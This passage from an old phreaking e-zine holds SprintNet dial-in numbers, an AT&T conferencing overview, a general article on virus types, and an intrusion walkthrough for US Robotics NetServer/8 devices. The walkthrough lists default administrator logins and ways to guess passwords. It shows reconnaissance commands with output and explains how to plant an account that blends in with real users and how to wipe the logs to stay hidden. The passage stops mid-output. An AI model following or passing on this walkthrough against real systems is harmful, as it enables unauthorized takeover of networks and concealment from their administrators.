is a local call from this city (Dartmouth into Halifax local calling area and Pointe Claire into Montreal local calling area). *** Add a 0 before the city code when dialing within this country. + Please note: Dial-In access procedures are slightly different than standard SprintNet procedures. If you need assistance, please contact Customer Service in Reston, VA, USA at 703-318-7740. ++ Add a 0 before the city code when dialing within this country but outside of the local calling area. +++ Add an 82 before the city code when dialing within this country but outside of the local calling area. ~ - When dialing into Paris FROM another city in France, dial 16 before the dial number. - When dialing to any city in France FROM Paris, dial 16 before the dial number. - When dialing into any city FROM outside of France, dial the country code 33 and the dial number. ~~ Add a 9 before the city code when dialing within this country but outside of the local calling area. ~~~ The dial numbers for Vietnam can only be accessed from within Vietnam. ^ Inclusion in the Service Level Agreement (SLA) is determined on a case by case basis. ^^ If you are a user of the ETPI phone system, please use the 760-1700 number. If you are a user of the PLDT phone system, please use the 816-2006 number. > Omit the country code (7) when dialing. >> Novosibirsk Region: for access from other regions dial 383 instead of 2 in city code. >>> City code 218 used for connections from Irkutsk. < City code 23 used for connections from Irkutsk. ]C[ DOMESTIC X.25 DIAL SERVICE - for asynchronous, SDLC, 3270 BSC, and 2780/3780 applications - at 1200 and 2400 bps - with built-in local error protection - from locations nationwide X.25 Dial Service sends your data in the enhanced X.25 protocol directly from a single terminal or a large cluster of terminals attached to a terminal concentrator supporting X.25. The service takes full advantage of your advanced equipment's speeds, built-in memory and processing capabilities. It supports up to 35 concurrent host sessions on a single call. X.25 protocol and application software interfaces should be selected based on customer communications requirements. For areas without local access, use SprintNet's In-WATS service. In-WATS Service Telephone Number ----------------------------------- 1200-2400 bps 1-800/546-6000 Consult the Data Network Rate Schedule for In-WATS pricing. Domestic Service Requirements ----------------------------- SPEED: MODEM TYPE: 1200 bps Bell 212A compatible 2400 bps V.22 bis compatible 1200/2400 ST AC CITY BPS CLASS --------------------------------------------------------------- AL 205 Birmingham 251-7619 B AZ 602 Phoenix 271-4467 A CA 818 Glendale 246-8480 B CA 213 Los Angeles 622-4913 A CA 916 Sacramento 446-9811 B CA 619 San Diego 236-0733 B CA 415 San Francisco 247-9992 A CA 408 San Jose 294-9129 B CA 714 Santa Ana 648-0311 B CO 303 Denver 745-1580 A CT 203 Hartford 549-5498 B DC 202 Washington 296-9095 A FL 305 Miami 374-1775 A FL 407 Orlando 898-3669 B FL 813 Tampa 229-6714 B GA 404 Atlanta 688-4650 A IL 312 Chicago 781-0961 A IN 317 Indianapolis 293-3273 B IA 515 Des Moines 288-6529 B LA 504 New Orleans 592-8673 A MD 410 Baltimore 783-5079 A MA 617 Boston 292-9572 A MI 313 Detroit 961-2922 A MN 612 Minneapolis 338-3327 A MS 601 Jackson 354-2795 B MO 314 St Louis 436-2919 A NJ 971 Newark 624-9463 A NY 516 Hempstead 565-5751 B NY 212 New York 645-3500 A NC 704 Charlotte 373-1589 A NC 919 Res Tri Park 549-8115 B OH 937 Cincinnati 241-0831 A OH 216 Cleveland 771-0228 A OH 614 Columbus 221-6319 A OK 405 Oklahoma City 235-9648 B OR 503 Portland 226-0866 A PA 215 King of Prussia 265-8060 B PA 215 Philadelphia 977-8172 A PA 412 Pittsburgh 281-7815 A RI 401 Providence 274-1780 B TN 615 Nashville 242-1762 B TX 214 Dallas 749-5078 A TX 713 Houston 227-2931 A UT 801 Salt Lake City 355-2414 B VA 804 Norfolk 626-0018 B VA 804 Richmond 644-0101 B WA 206 Seattle 343-2862 A WI 920 Milwaukee 271-0113 A ----------------------------------------------------------------------------- Well we have reached the end of my garbage for this issue of f4ith. have some phreaking fun this summer kiddies. "everyone who burns has to learn from the pain". check out #darkcyde on IRC EFnet redshadow EOF -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ AT&T CONFERENCING ]::::::::[OO--[ by redshadow ]::::::::::::::::::: -->[OO]:[ INFORMATION ]::::::::::::-[ redshadow@coldmail.com ]::::::::: -->]OO[:::::::::::::::::::::::::::::::::::[ http://redshadow.faithweb.com ]:: Shouts -( z0mba | ginger | kraise | hybrid | simmeth | mranon | 9x | #darkcyde )- _____________________________________________________________________________ ============================================================================= :*: AT&T CONFERENCING INFORMATION :*: _____________________________________________________________________________ ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- ________________________ What is Conferencing ? | _______________________/ Conferencing is the process where numerous persons dial in to a number and perform a 'confernce' based either on voice , data [including video] all covered in this documentation. Many telco's use this service to attract the travelling business men/women and friends who wish to communicate. _________________________ Setting up a Conference | ________________________/ AT&T conferences can be setup at [ https://www.teleconference.att.net/resv/Login.html ] To use this online form you must have your account created which can be done by calling 1 800 232-1234, ext. 600. where-as you would request an "Internet Reservation Account Folder". An AT&T TeleConference Specialist will assist you in the enrollment process. If you call for a reservation, please be prepared to give the AT&T Audio Conference Specialist this information: Date and time of the call Anticipated call duration Number of participants AT&T will: Then you should ... Schedule the call Provide a Dial-In telephone number Provide a six-digit security access code for the Audio Conference host ... this number is used to identify the Audio Conference Provide a six-digit security access code for participants ... this number is used to prevent unauthorized participation Be sure to provide the following to all participants: Date and time of the Audio Conference Dial-In access telephone number Participants' security access code If you wish to setup a host-dialed audio conference please consult At&t at Call 0 700 456-1000*. You will be asked to enter the number of connections. You will be told how to add participants to the conference this type of conference is available in most locations, calls from hotels and rotary or public phones may be restricted. Host-Dialed Audio Conference charges will be billed to your home phone. If you have difficulty getting through, dial 1 800 544-6363. Dial 10+ATT first if calling on a non-AT&T designated line. If you wish to setup a Operator-Dialed audio conference call Call 1 800 232-1234 for reservation and setup. the AT&T Audio Conference Specialist will want this information: Date, time, and time zone of the call Anticipated call duration Number and phone numbers of the participants If your Audio Conference is for a future date: Your call will be reserved by an AT&T Audio Conference Specialist You will receive an ID number for easy reference If you need to make a change before the conference, just call 1 800 232- 1234 ... and be sure to provide your ID number. If you wish to setup a video or data conference then Call 1 800 VIDEO GO (1 800 843-3646) To register and place a reservation. Choose the Best Billing Option ... host or end user, single or multi- location. Call detail gives you flexibility in managing and controlling billing to meet your business needs. _____________________________________ Conferencing Types Supplied by At&t | ____________________________________/ ____________________________________ :: AUDIO CONFERENCING :::::::::::::: Audio conferencing the most popular conference type is divided into three sub groups [Dial-in audio conference, host-dialed audio conference, and operator- dialed audio conference] all different AT&T services for the public to use. ### Dial-In Audio Conference Service Dial-In audio conference service from AT&T alows participants to call into the Audio Conference from virtually any telephone, including hotel phones and public payphones. This service is available all the time and conferences can be between 15 minutes and 24 hours in duration. Conferences can have up to 150 connections. These connections can be from anywhere on the globe. These converences are secured by authorization codes [6 digit codes]. ### Host-Dialed Audio Conference This service is for conferences you want to set up yourself. You can talk for up to 5 hours on this conference and host up to 15 connections, including host. Participants are added one at a time ### Operator-Dialed Audio Conference Service Operator-dialed audio conferences allow you to have unlimited connections for your confernce, which can also last 24 horus. This conference can be logon to from anywhere on the globe. Operator-dialed audio conferences can also host special services to ... Host listening-only for participatents Establish who is present on the call Recording on audiocassette Written transcription of the recorded conference Translation services ____________________________________ :: VIDEO CONFERENCING :::::::::::::: Video conferencing enabled with video systems or personal computers equipped with video capabilities. Allows groups to interact live in video with one and another using At&t communications with a genuine interactive conference including voice, video and data. AT&t allows the option for users of this service to connect three of more sites with multipoint bridging, connect locations with dissimilar video equipment with Codec conversion, connect locations using different digital transmission speeds with speed conversion and rate adaptation, connect network-linked locations linked to other Spacenet locations with GE spacenet satellite services, and enhance video quality with inverse multiplexing to combine channels for increased bandwidth. Two video conference options are dial-out and dial-in. Dial-out is where you set the reservation and at&t will dial out all participants and bring them into the conference, dial-in is where the participants dial into the video conference themselves. Changes in your conference can be performed by a seperate touch tone telephone. Audio participants can interact with the Video conference. _____________________________________ :: VIDEO/DATA SHARING CONFERENCING :: AT&T Video/Data Sharing Conferencing is your key to holding "virtual meetings." These genuine interactive desktop conferences include voice, video, and data for complete real-time business communication. In this conference you can have access to services that allow sharing of computer applications and data files Like the video conference this video/data conference offers the choice of you allowing at&t to connect the participants with dial-out or allow them to access the conference with dial-in. _________________ Closing Remarks | ________________/ Well we have arrived at the end of my At&t conferencing document for this issue of f4ith many thanks go to d4rkcyde for letting me publish such material. to At&t for supplying this great service and the information in this document. Many thanks also goes to the phreaking community and all my friends for saying "Cool!" when i pulled off stunts at telephone booths and elsewhere. May phreaking always be fun before everything else. redshadow -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Computer Virii ]::::::[OO--[ by [JaSuN] ]--[ jasun@phreaker.net ]:: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: --oOo--> Computer Virii And Other Malicious Programs ]----- --oOo--> -------------------------------------------------- --oOo--> Main Article Introduction ]--- --oOo--> Introduction To Virii ]--- --oOo--> What Can Be Affected ]--- --oOo--> Virus Threat ]--- --oOo--> Types Of Virii ]--- --oOo--> --* Boot Sector ]--- --oOo--> --* File Infecting ]--- --oOo--> --* Multi-Partite ]--- --oOo--> --* Polymorphic ]--- --oOo--> --* Stealth ]--- --oOo--> Worms ]--- --oOo--> Trojan Horses ]--- --oOo--> Logic Bombs ]--- --oOo--> Legal Issues ]--- --oOo--> Conclusion ]--- --oOo--> Disclaimer ]--- --OoO--> ============================================= ]--- Main Article Introduction: ========================== In this article I will explain what different types of destructive computer programs exist and what problems they can sometimes cause. People often get confused with the different terms commonly used, so you should have more of an accurate idea by the time you have finished reading this article. Introduction To Virii: ====================== A virus is a computer program that executes when an infected program is run, therefore only executable files can be infected. That fact alone confuses many people, some people assume that any file can be infected, which is not the case. On Windows based systems, executable files have the extensions of .exe, and .com, although other files can be run such as .bat files which can also be modified to run arbitrary commands or operations. A virus infects other programs with a copy of itself. Each one has the ability to clone itself so that it can multiply, constantly seeking new files to infect. Some of the most harmless Virii do nothing but multiply, replicating and spreading around onto new uninfected computer systems. More dangerous Virii, not only replicate themselves, they also damage or modify other programs. These Virii are more annoying, as they can cause data loss and are more time consuming to remove. When these Virii start causing damage to a system, they have activated their built in payload. Some Virii have a very dangerous payload, others are just designed to be annoying, by displaying a message on screen or playing a funny sound. Virus programs and other malicious programs are often very small, sometimes only a few kilobytes in size. This enables the virus to be easily hidden from Anti-Virus scanners. Virii can infect any computer, it does not make any difference if it is a laptop or a network server. Different Virii exist for different Operating Systems, there are Virii for all of them, although more exist for Windows than any other. Once a virus has been written, it can be distributed very easily be the author, the main means of doing this today would be to use the Internet. Once on the Internet, it will be available to anybody, to either distribute to others with knowledge of what it is, or by accidental means. The Internet is not the only way for the new virus to replicate. It may be given to people on disk, who then use it in their computer, which is on a company network, for example. These factors make it harder to trace the virus back to the author, or the person that actually released it into the pubic domain. Once a virus is active on a host computer, it could spread onto large networks. One of the main protections against this, is using good Anti Virus Software. If the virus is detected before its payload is released or is it able to spread then the results will be better than if the virus had discharged its payload. Virii enter computer systems from external sources, Virii are made to be attractive. An example would be a new application that is available for download from the Internet. People may download it, run the installation program, then the new virus is out on their system. During the time before the virus was undetected by conventional Anti Virus Software, it may have caused a lot of damage. For this reason, it is important to keep the database patterns that the anti viral software uses upto date. A virus can also be programmed to activate straight away or it can be made to lie dormant for a certain period of time, until a certain date or action triggers it. There are also many other variations that can be made to activate a virus or its payload. Timer functions of a virus are provided by the Logic Bomb. There are a lot of ways a virus can spread, although some methods are more common than others. For example, if you download a piece of software from the Internet, then take it into work on a disk without checking it for any infections, you may risk infecting the company network. If the downloaded software was in fact clean, it could still be infected once it is on your computer. Floppy disks were the main method of transporting Virii, today they are not used as much as before, because of the constantly expanding Internet, files can be sent quickly and easily by using email. What Can Be Affected: ===================== There are a number of characteristics that need to be in place for a virus infection to take place. For example, the file must be: ****-> Executable ****-> Stored on a write-enabled disk ****-> Have individual write properties Write protecting a disk can stop some infections, but at some point you will want to write to a disk so you would need to remove the read-only property. At this point the files on the disk are open to being written to. In the case of a Hard Disk Drive, it would not be an option to write protect it, as the operating system will need to write to it. If you wanted to do this, setting the read only properly on executable files would be more appropriate. This is not the only protection, the most important step is the anti virus software. If a virus were to attach itself to a file, then the file size would change, most scanners would notice this, the checksum of the file will change as well, which is another thing to look out for. Some Virii will cause the checksum to report as being what it should be, so that test can be bypassed. Another difficult location to detect a virus would be on the first physical sector of a Hard Disk Drive, known as the (FAT) File Allocation Table. Virus Threat: ============= Some people have never encountered a virus infection or seen any evidence of what an infection has done to anybody. Some people that use anti-virus scanning software, have never had a warning about an infection either. So is this problem just over speculated or is the threat as big as the anti-virus scene makes it out to be? There are Virii out there, the threat is large if you don't take the correct precautions. The real problem is that once a virus is released into the computing world, it is still a problem as long as one copy exists. As Virii replicate, one copy of a virus can literally turn into thousands. If the threat is so big, where are all the reports of virus attacks? There are a few that hit the news, most never make it into the headlines unless they cause a lot of damage or spread rapidly. Most companies don't like to report their encounters with Virii, as they don't want it to be broadcast publicly. There are opinions that anti-virus companies release the Virii into the community to help sell their products. Some people will agree with this, but if you are into the virus scene, you will know that this in the most part is not true, as if you are in the scene you will know people that code and release Virii, either for educational purposes or to cause infections. Either way, the virus programmers will continue to release Virii and the anti-virus community will continue to make a large amount of money from it. Usually, the virus programmers get a sense of power, when they know that their new virus is out there, undetected by commercial software. In one respect, it is a fight between the virus programmers to beat the anti-virus companies by trying to release a virus that stays undetected for a long period of time. Types Of Virii: =============== There are a number of types of Virii that can infect computer systems. The more common types are: ****-> Boot Sector ****-> File Infecting ****-> Multi-Partite ****-> Polymorphic ****-> Stealth Boot Sector Virii: ================== Boot sector Virii infect the boot sector, which is also known as the master boot record. Firstly, the original boot sector would be overwritten or moved, if moved it would be placed on another sector of the hard disk, which would then be marked as bad, so it would not be used in the future. A boot sector virus can be difficult to detect, since they are usually programmed well. As the boot sector is the first thing read from a hard disk on booting the computer, it is usually more difficult to detect boot sector Virii. Out of all the Virii infections that are reported, three out of every four are boot sector Virii. The only real way to become infected with a boot sector virus is to boot the computer with an infected floppy disk in the floppy drive. The boot sector is protected more now, by using built in protection in the BIOS, it will warn you if anything tries to modify the boot sector. As the boot sector is only usually modified when a new operating system is installed, if your BIOS warns you that the boot sector is about to be modified you should run a complete anti virus scan and make sure you have the latest updates for you scanner. File Infecting Virii: ===================== These Virii only infect executable files, which have the extensions of .exe and .com, they are also usually memory resident. Some file infecting Virii are programmed to only infect *.com or *.exe and others are designed to only infect files with certain letters in them, for example. In comparison to boot sector Virii, they act in much the same way by moving the original code to another part of the file and replacing it with its own infection code. The size of the infected file would increase after that process, which enables detection to become easier in same cases as anti-virus software could alert you that the size of the file has changed, even if it does not detect that it is infected with a known virus. Sometimes the virus would change the extension of the infected file, to hide it from detection until a later date, as some anti-virus scanner software only checks files with the extensions of .exe or .com. Most newer software is more advanced and you can configure it to scan whichever file types that you want. Polymorphic Virii: ================== Polymorphic Virii are probably the most advanced Virii of all. They can change their appearance with each infection, which makes it more difficult to detect them. Also, they usually have an encryption routine to help hide themselves and it also acts as an anti-debugging mechanism, to stop an-Virii companies finding out how it infects and it also stops people from taking the code without permission from the author and using it in their own Virii. Not only do they have the ability to encrypt, they can also change the encryption algorithm with each infection as well as the way they infect. As this makes detection more difficult, anti-virus software must be able to perform algorithmic scanning as well as string based scanning methods to successfully detect an infection from a Polymorphic virus. Stealth Virii: ============== These Virii attempt to hide, without being noticed from the Operating System and any installed anti-virus scanning software. To achieve this, the virus must stay resident in memory (TSR). By staying in memory, it can make changes to files and directories easily. As the virus is memory resident, there will be less memory available to the system, although this type of virus is usually small, so would not take up memory. Good anti-virus software will detect and remove resident Virii from memory, which needs to be completed before the disk based components of the virus can be removed. Multi-Partite Virii: ==================== These type of Virii infect the boot sector and executable files. They are also the most difficult to detect, as they can combine techniques from the other types of Virii. The damage caused from an infection from one of these types of Virii can be the most damaging, sometimes causing a total loss of data on computer systems. Some of the more advanced Virii, can also spread over a network, which when combined with the other techniques used to avoid detection and removal, can cause a company network to grind to a halt. For this reason, it is always a good idea to keep important data backed up, as it is better to be safe than sorry. Introduction To Worms: ====================== Apart from Virii, there are a number of other programs that are designed to be destructive to computer systems. Worms are also programmed to alter or destroy data, but their main difference from Virii is that they can be programmed to exploit holes in various operating systems in order to gain access to the system. In that sense, they do replicate to other hosts but they do not spread in the same way as Virii do by simply spreading onto floppy disks. The damage that worms can cause can be just as serious as a virus attack, especially if not discovered in time. For example, a worm could be programmed to exploit mountd, to gain access to a vulnerable host. Firstly, the worm would have to be released on a system, once on that system, it could scan an IP subnet and find hosts that are open to being exploited. Once into a system, it could then patch the hole that allowed it to gain access originally, then proceed to backdoor the system and run a scan on another IP class. It could also email a list of exploited hosts hosts to an account that had been set-up by the author, or another individual that releases it. This process of replication could continue, as long as there are hosts to exploit. Considering that a lot of systems are not patched against new exploits straight away, it would be quite a field day for a new worm that uses that new hole to gain access. Introduction To Trojan Horses: ============================== A Trojan Horse is a destructive program that has been concealed inside another genuine piece of software. In addition to this, a worm or virus would be hidden inside a Trojan Horse. The main reason a Trojan Horse is not a virus, is because they do not replicate like Virii. There is a long history behind the origin of the Trojan Horse. When Greek warriors built a large, attractive wooden horse they were able to hide their warriors inside. They left it outside the gates of the city of Troy. When the Trojans saw it, they thought it was part of a peace offering and gladly opened the gates and took it into their city. Once inside the Greek warriors jumped out and started fighting with the Trojans and destroying their city. Trojan Horse software works in the same way. The software package might look good and seem genuine, which gives the user the piece of mind they want, so they download and run the executable. The software package itself is legitimate but the Trojan Horse is lurking inside and will be able to get out once the executable is run. Once out, it could continue with what it was programmed to do, at this point it may act like some Virii and wait until a certain date or other activation method, before proceeding to release its payload. Trojan Horses can also be programmed to self-destruct, leaving no trace of their existence, apart from the damage that they have caused if not discovered in time. A Trojan Horse is particularly good for the once common banking crime known as Salami Slicing, in which small sums of money are transferred from a number of accounts into another account operated by an intruder. Due to increasing security, that and other schemes are harder to complete successfully as time goes on. Introduction To Logic Bombs: ============================ A Logic Bomb is similar to a Trojan Horse. Each has the ability to damage or destroy data, the difference is that a Logic Bomb has a timing device so that it can be programmed to go off at a particular date or time. For example, the Michelangelo virus is embedded inside a Logic Bomb. Logic Bombs can still be very destructive on their own, as they usually are developed in much the same manner as Virii are, even if they lack the ability to replicate as Virii can. Logic Bombs are timed to do maximum damage. Once example of this would be an ex-employee, that wants to cause some damage to the company network. They could install a Logic Bomb on the network computers and set it to activate months after they have left. Legal Issues: ============= There are a number of legal issues related to Virii and other malicious programs. To program and virus and put it up on your website for educational purposes in source/binary form should not be illegal. Of course, people will download it and then distribute it to people to cause damage to their systems, this would be illegal. Regardless or being illegal or not, people will still continue to write and distribute Virii and other infecting programs that allow unauthorised access to computer systems. Conclusion: =========== I hope that you enjoyed reading this article and that you actually learned some new information from it. If you have any comments or suggestions about this article, please feel free to send me an email: jasun@phreaker.net I hope this gave you a little insight into the world of the virus and other related programs. Look out for more articles from me in the future. I have made this information as accurate as possible to my knowledge, but don't complain if I made an error, most of this was written at times around 4am in the morning. Disclaimer: =========== This document is for educational *INTERNAL USE ONLY* It is for educational purposes only, the information contained within it must not be used to cause damage to any person/system. What you do with this information is your business, but anything that arises from its misuse cannot be held against anybody, apart from yourself. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ US Robotics ]::::::::::::::[OO--[ by hybrid ]:::::::::::::::::::::: -->[OO]:[ NetServer/8 ]::::::::::::::::::-[ hybrid@dtmf.org ]:::::::::::::::: -->]OO[:::::::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::: An Introduction to the U.S. Robotics NetServer/8 by hybrid (hybrid@dtmf.org) Welcome to my brief article explaining different commands etc on the U.S Robotics NetServers which are becomming incresingly popular. These servers are an extream sercutity risk to any network that uses them for network managment, they essentialy give whoever has administrator access _total_ control over its surrounding network, after all, the NetServer is designed for network managment, I'll go into this in detail in a while. So why am I writting this article? -- Well I stumbled accross a website one night which featured information on the U.S. Robotics NetServer, the site's content was basically braging about the "tough security" of the NetServer, after seeing this, and I manageed to stop laughing, I decided to write this file, for your enjoyment :) So lets take a look at the NetServer. You are likely to stumble accross this type of system either by the means of dialup modem, or by ip, telnet etc. The NetServer will identify itself like this: Welcome to USRobotics The Intelligent Choice in Information Access login: Note: in most cases admins have made an 'intelligent' choice in choosing this server for thier networks, but when it comes to system security, I would avoid the phrase 'intelligent' by a mile. The NetServer, like most OSs/ net amnagment systems, comes with a nice set of factory default logins, which in most cases will give whoever has these logins super-user access to the network. Hmm, ok (thats _real_ security - well done USRobotics) When loging in, the following default accounts will usually get you in: USER PASSWORD ACCESS LEVEL ---- -------- ------------ admin admin god default default enough to get god access ....... ........ ........................ manager manager god } I've only ever seen guest guest not good enough these a few times. The access that I am going to focus on with this file is the admin access. The admin account will nearly all the time exist, so try variations of the password, you know, the usuall shit: admin manager admin } on some systems I have noticed that finger port admin administrator (79) is open, and will list a suprising amount of admin root info about the admin, ie: last name, location etc, admin manage this would maybee be you're advantage when guessing. Okee then, you got in. You'll be confronted with somthing a little like this: NetServer: } the command line shell. You have several choices, including or . Right, here are the choices. CONNECT LOGOUT TELNET EXIT MANAGE HELP RLOGIN Very self explanitory, but there are a few things you need to know. To begin with, the netserver uses differnt keys to edit.. Command Line Edit: The following options are available: -------------- ^a - start of command ^b - left 1 char ^d - delete char ^e - end of command ^f - right 1 char ^n - next command ^p - prev command ESCb - left 1 word ESCf - right 1 word <- - left 1 char -> - right 1 char up arrow - prev command down arrow - next command -------------- The main option you are interested in from the above menu is the MANAGE command. Once you have entered the manage session you will be confronted with the following command line prompt: manage: or session: (user definable).. hit you will get the following options.. ------------ ADD HANGUP RENAME ARP HELP RESET ASSIGN HIDE RESOLVE BYE HISTORY RLOGIN COPY KILL SAVE DELETE LEAVE SET DIAL LIST SHOW DISABLE LOGOUT TELNET DO PING UNASSIGN ECHO QUIT VERIFY ENABLE REBOOT EXIT RECONFIGURE Nice huh? :) right, now I'm going to go into each command in detail, right from to and all the sub-commands. ----------- APPLETALK IP SNMP DNS IPX SYSLOG FILTER LOGIN_HOST TFTP FRAMED_ROUTE MODEM_GROUP USER INIT_SCRIPT NETWORK ------------ The add command is used to upgrade, or add to the current network from which the netserver is hosted. For example, you can update DNS server configurations/routes/ip designation etc, aswell as link other networks to work in synthony with each other. The commands are very self explanitory, and will offer help as you go along. A note though: on most systems the log file will begin loging everything if it notices a sudden rises in command line activity, this is not for security reasons, but more for administration debug, you can alter this if you like, or wipe the log file all together, more on that in a bit. When updating/or adding network configurations, the IP formating for the netserver is as follows: ------------ This field is a IP Host Name or an IP Network Address The expected format is Station_Address{/Mask_Specifier} The expected format for the address is a.b.c.d Each value must be in the range of 0 to 255 decimal. The address 127.x.x.x is reserved for Loopback and cannot be specified. The Mask Specifier can be in ip address format in which case it must be 255.0.0.0 or greater and contiguous or 'A', 'B', or 'C' or a numeric value from 8 to 30 describing the number of one bits in the mask If this is being used to set a User's IP Address The Mask Specifier can also be 'H' (for Host) or a numeric value to 32 But before we go and do anything crazy, take a look at the current system configuration/setup. Here are the options, turn asci log on for future reference (don't be dumb, 3DES ;) .. session:list CLI - Missing Required Argument(s): This field is a KEYWORD. The possible values are: AARP FILTERS PROCESSES ACTIVE INIT_SCRIPTS SERVICES APPLETALK INTERFACES SNMP AVAILABLE IP SWITCHED CONNECTIONS IPX SYSLOGS CRITICAL LAN TCP DIAL_OUT LOGIN_HOSTS TFTP DNS MODEM_GROUPS UDP FACILITIES NETWORKS USERS FILES PPP ..................... manage:show This field is a KEYWORD. The possible values are: ACCOUNTING DNS NETWORK APPLETALK EVENTS PPP AUTHENTICATION FILE SECURITY_OPTION CLEARTCP FILTER SNMP COMMAND ICMP SYSTEM CONFIGURATION IMODEM TCP CONNECTION INTERFACE TELNET CRITICAL_EVENT IP TIME DATE IPX UDP DDP MEMORY USER DIAL_OUT MODEM_GROUP As you can see, there are plenty of commands at your dispossal. First, its always a good idea to check who else is on the system/server, so we use the list connections command, it should look a little like this: session:list connections CONNECTIONS IfName User Name Type DLL mod:1 shitface DIAL_IN PPP mod:3 admin DIAL_IN NONE <-- you .......... The netserver will also have dialout commands, but, this is only using the server for somthing lame, its full potential is in the IP routing. To check to see if dialout is enabled anyway, just use the command, that will tell you what serial pools the modems are connected to. OK then, now we are going to focus on configuring an account for ourselves, and blending into the user list with stealth. Before hand though, you need as much information on the system as possible. So here we go. session:list dns servers DNS NAME SERVERS Preference Name Address Status 1 123.111.200.011 ACTIVE session ............. To gather IP addressing/routing information we can use the following commands: --------------- session:list ip CLI - Missing Required Argument(s): This field is a KEYWORD. The possible values are: ADDRESSES INTERFACE_BLOCK ROUTES ARP NETWORKS session:list ip addresses IP ADDRESSES Bcast Reassembly Address Algo Max Size Interface 127.000.000.001/A 1 3468 loopback 123.111.164.230/C 1 3468 eth:1 ...... session:list ip arp IP ARP IP Address Phys Address Type IfName 123.111.164.001 00:87:3i:28:24:40 Dynamic eth:1 123.111.164.179 00:27:ah:01:4f:60 Dynamic eth:1 ...... session:list ip interface_block IP INTERFACE BLOCKS Address Neighbor Status Interface 000.000.000.000/H 123.111.164.231 ENABLED mod:1 123.111.164.230/C 000.000.000.000 ENABLED eth:1 ...... session:list ip networks CONFIGURED NETWORKS Name Prot Int State Type Network Address ip IP eth:1 ENA STAT 123.111.164.230/C IP-loopback IP loopback ENA AUTO 127.0.0.1/A 2608159-ip-I3 IP mod:1 ENA DYN 123.111.164.231/H ...... session:list ip routes IP ROUTES Destination Prot NextHop Metric Interface 000.000.000.000/0 NetMgr 166.079.164.001 1 eth:1 127.000.000.000/A LOCAL 127.000.000.001 1 loopback 127.000.000.001/H LOCAL 127.000.000.001 1 loopback 127.255.255.255/H LOCAL 127.255.255.255 1 loopback 123.111.164.000/C LOCAL 123.111.164.230 1 eth:1 123.111.164.230/H LOCAL 123.111.164.230 1 eth:1 123.111.164.231/H LOCAL 123.111.164.231 1 mod:1 123.111.164.255/H LOCAL 123.111.164.255 1 eth:1 255.255.255.255/H LOCAL 255.255.255.255 1 eth:1 ...... session:list tcp connections TCP CONNECTIONS Local Address Local Port Remote Address Remote Port Status 000.000.000.000 23 000.000.000.000 0 Listen 000.000.000.000 139 000.000.000.000 0 Listen 000.000.000.000 5000 000.000.000.000 0 Listen ...... session:list tftp clients TFTP CLIENT ADDRESSES 123.111.162.15 ...... session:list udp listeners UDP LISTENERS Local Address Port 000.000.000.000 69 000.000.000.000 161 000.000.000.000 520 000.000.000.000 1645 000.000.000.000 2049 000.000.000.000 2050 000.000.000.000 3000 ...... To get a complete system configuration use the command: session:show configuration CONFIGURATION SETTINGS System Identification: Name: RAS_Sam Contact: hybrid Authentication Remote: ENABLED Local: ENABLED Primary Server: 123.111.162.159 Secondary Server: 000.000.000.000 Remote Accounting: ENABLED Primary Server: 123.111.162.159 Secondary Server: 000.000.000.000 Interfaces: eth:1 loopback mod:1 mod:2 mod:3 mod:4 mod:5 mod:6 mod:7 mod:8 IP Forwarding: ENABLED Routing: ENABLED RIP: ENABLED Dynamic Pool Beginning Address: 123.111.164.231 Size: 8 Networks: ip ETHERNET_II eth:1 123.111.164.230/C IP-loopback LOOPBACK loopback127.0.0.1/A IPX Default Gateway: 00000000 Maximum Hops: 15 Dynamic Pool Beginning Address: 00000000 Members: 0 Appletalk ARAP: ON Maximum ARAP Sessions: 8 PPP Receive Authentication: PAP DNS Domain: uber.coffee.co.uk Servers: 1 123.111.200.11 ........... session:show dns DNS SETTINGS Domain Name: uber.coffee.co.uk Number Retries per Server: 1 Timeout Period in Seconds: 5 ........... Now thats enough information you will need about the netserver for the time being. There are also a wealth of other commands concerning to listing of IP configurations, but those are the more important ones, the next set of commands list and show information about the netservers files/architecture setup. ------- session:list files Appletalk.cfg CLI.cfg CallInitProcess.cfg ConfigProcess.cfg DNS.cfg } the DNS configuration DialOutProcess.cfg EventHandler.cfg you can view the contents of a file by FilterMgr.cfg using the command, IPForwarder.cfg this will only show the contents of a IpxProcess.cfg file if it is in raw ascii. PilgrimStrings.ind PilgrimStrings.str PppProcess.cfg QuickSetup.cfg Robo.stats RoboExecNMProcess.cfg RoboString.ind RoboString.str SnmpProcess.cfg TermProt.cfg TftpProcess.cfg aaa log-file.local ns816.bin.z old-log-file.local user_settings.cfg userindex users wall_1 ........... OK, now I'm sure you are feed up with reading what commands the netserver has it's time to take a look at what it can do, and _how_ you can do it. To begin with you need you're own account, not just any account though, you need an account that will blend in with the others. Now here is the intersting part, when you configure an account, you can specify a set IP for the user you add, you can then (using your own box and DNS server) set up your own sub-domains, but the cool thing is.. you can configure this all on the netserver. The netserver has some very advanced options when setting up accounts, you can specify that you're IP statistics/routing etc are cloaked and even spoofed (internally) If you are configuring an account on a net connected netserver, you will be online, and not even exist. (you are behind a multi- layer firewall, and you're IP is non-existant) First things first, its a good idea to get a listing of the current users on the network so we can make an account that will blend in with the others, and not stick out to much. For this, use the command. ---------- session:list users USERS Login Network User Name Service Service Status Type admin TELNET (D) PPP (D) ACTIVE LOGIN MANAGE shitface TELNET (D) PPP INACTIVE NETWORK default TELNET PPP INACTIVE NETWORK 1233333 TELNET PPP INACTIVE NETWORK 1207706 TELNET PPP INACTIVE NETWORK 1304708 TELNET PPP INACTIVE NETWORK ........ As you can see the higher ratio of users have a numerical username, therefore when it comes to configuring our own account, we will have a numerical user- name aswell -- common sense really. Did you notice that the user 'shitface' had a PPP dialin connection before? (show connections).. Well the user shitface will have the correct IP/network configurations in order to establish a PPP connection. So we need to get more information on the user shitface. User the command session:show user shitface INFORMATION FOR USER: shitface Status: INACTIVE Type: NETWORK Expiration: 00- -0000 Message: Callback Type: NORMAL Phone Number: 1-800-SCAN-4IT Alternate Phone Number: 1-800-OPERATOR Input Filter: Output Filter: Modem Group: all Session Timeout 0 Idle Timeout: 0 PARAMETERS FOR NETWORK USERS: Network Service PPP Header Compression: TCPIP (D) MTU: 1500 Send Password: Appletalk: ENABLED (D) Appletalk 